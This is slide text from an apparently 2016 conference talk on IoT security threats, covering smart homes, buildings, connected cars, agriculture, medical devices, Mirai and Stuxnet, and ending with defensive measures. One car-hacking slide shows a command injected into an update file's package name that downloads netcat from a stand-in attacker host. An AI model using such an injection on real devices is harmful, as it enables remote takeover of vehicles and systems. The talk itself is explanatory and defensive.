The Internet of Threats BILLIONS OF WAYS THE IOT POSES AN INFOSEC CHALLENGE
Chris Poulin
CyberCrime 2016 Symposium: Cyber Convergence
IoT Researcher, Futurist
Maker
Breaker
Threat intel
Data geek
Provocateur
TV & movies
The easiest way to hack an Airbus A319
Some questions to establish context
What is your role wrt the IoT? • Personal consumer of the IoT • Enterprise manager of IT systems • A maker of IoT devices
What is your biggest concern with the IoT? • Safety (e.g., HVAC systems gone wild) • Data privacy • Infrastructure security (e.g., IT comingling with IoT) • New enterprise attack vectors (e.g., end users with wearables)
Smart Home Device Examples: Home Security
Security control and alarm panels
Smart door locks
Smart garage doors
Motion detectors
Window and door contacts
Security cameras
Smart doorbells
Smart Fridge
Smart Lighting
Smart Dishwasher
Smart Oven
Smart Television Smart Utensils
Smart Wine
Smart Faucet
Smart Home Device Examples: Appliances, Lighting, Entertainment
Appliances • Refrigerators and cooktops • Beds • Autonomous vacuums
Lighting • Light bulbs (plain white and color changing) • Pathway lighting • Indoor and outdoor
Entertainment • Smart televisions and DVRs • Audio systems
Smart Home Device Examples: Environment & Safety
Smart thermostats Smoke / CO
detectors
Smart blinds Water leak detectors
Smart air conditioners
Baby monitors
Smart homes are vulnerable
Your WiFi password is “fluffy123”
“Buy V!gar4”
Why does home automation matter to enterprise IT security? Mirai malware infected devices
Krebs OVH Dyn
620-650 Gbps ~1 Tbps Amazon, PayPal, Box, Slack, Twitter, GitHub, Netflix, Airbnb, Pinterest, Quora, Spotify, Yelp, Second Life, WWE Network
Smart Elevators
Smart Lighting
Smart Doors
Concrete Monitors
IIoT Device Examples: Building Automation
Electric & water
HVAC
Security systems
Lighting
Elevators and escalators
Polarized windows
Earthquake absorbers
Concrete mixing & curing
And they will be connected to your IT networks
IT Network BAS Network
Connected Cars
Connected Infrastructure
IIoT Device Examples: Smart Cities & Municipalities
Utilities
Lighting
Traffic flow
Trash
Air quality
Violence detection
Connected vehicle threat surface
Engine Control Unit
Transmission Control Unit
Airbag Control Unit
Anti-lock Braking System
Tire Pressure Monitor
Vehicle to Vehicle / Vehicle to Infrastructure Communications
Instrument Cluster / Telematics
Keyless Entry / Anti-theft
OBD-II
Car Multimedia
Dynamic Stability Control
DSRC RF RF channel
Bluetooth, WiFi, media players
OnStar, Uconnect, etc.
Direct connection RF channel
IVIs are messy
Linux / Tizen / QNX
Audio module (open source?)
Video module (open source?)
Apple CarPlay module
Google Android module
Microsoft Sync module
GPS module
Telematics
Voice module (open source?) Update feature
WiFi module
…so let’s break one
Port 6667/TCP
V850
SPI
CAN bus
updates.txt somepkg ‘; wget http://evil.org/nc; nc …
Number of latent vulnerabilities in a modern luxury vehicle Using the Linux kernel as a comparative model (as of 10 Oct 2016)
15M lines of code in Linux Kernel
1,507 reported vulnerabilities
1 vulnerability in every 9,954 lines of code
Source: http://www.cvedetails.com/vulnerability-list/vendor_id-33/product_id-47/Linux-Linux-Kernel.html
~10,000 latent vulnerabilities
The perfect storm of resources & tools
eBay, SparkFun, etc.
http://www.ioactive.com/pdfs/IOActive_Adventures_in_Automotive_Networks_and_Control_Units.pdf http://illmatics.com/car_hacking_poories.pdf http://marco.guardigli.it/2010/10/hacking-your-car.html http://opengarages.org/handbook/
Build your own vehicle hacking lab & test cart
Protocol decodes available
IIoT Device Examples: Heavy Industries
Manufacturing: • Pumps • Conveyors • Robots
Energy & Utilities: • Smart meters • Transformers • Pumps • Dam gates
Industrial IoT incidents
German steel mill
Stuxnet
Agricultural vulnerabilities
Planters: seed depth
Sprayers: dosage manipulation
Silos: manipulate environment
Livestock: feeding, drug, and environmental systems manipulation
Milk: manipulate pasteurization and pH balancesystems
Hydroponics: manipulate environment
Irrigation: manipulate control and data
Seeds: manipulate environment
Slaughter: remote control—effect? Who knows…
Processing: manipulate waste system (reverse?)
IIoT Device Examples: Consumer Services
Healthcare • X-ray machines • Chemistry analyzers • Pacemakers, insulin pumps
Retail • Inventory tracking • Stocking & picking • Shipping
Healthcare: hacking a telesurgery unit
Wearable device examples
Apple Watch Android Wear
Google Glass Fitness Trackers
Pacemakers
Insulin pumps
Subcutaneous vitals monitor
Wearables security
Fitbit Bluetooth
Sync to PC
Malware: PC pwned!
Be Winston Wolfe. Solve problems.
“You’ve got a corpse in the car, minus a head. Take me to it.”
The layers of the IoT
Traditional IT Services & Security
IoT defense for IT security professionals (1 of 4)
1. Conduct an asset inventory
• Focus on critical assets and sensitive data
• NetFlow to passively identify assets
• VA scans to actively identify assets and add context
• RF scanning
• GQRX
• Scripting skilllz
IoT defense for IT security professionals (2 of 4)
2. Segment systems based on risk
• Enclave firewalls
• Software defined networks
3. Monitor & defend IoT devices on the network
• IDS / IPS
• NetFlow—look for anomalies
• Map relationships of wearables to mobile to users
IoT defense for IT security professionals (3 of 4)
4. Protect IT endpoints
• Endpoint protection software
• VA scanning / patching
• Phishing exercises
5. Collect logs and events from IoT devices
• Log management / SIEM
IoT defense for IT security professionals (4 of 4)
6. Update security policies to include IoT devices
7. Familiarize yourself with non-IT connected devices
https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project http://builditsecure.ly/ https://www.iamthecavalry.org/
Resources for makers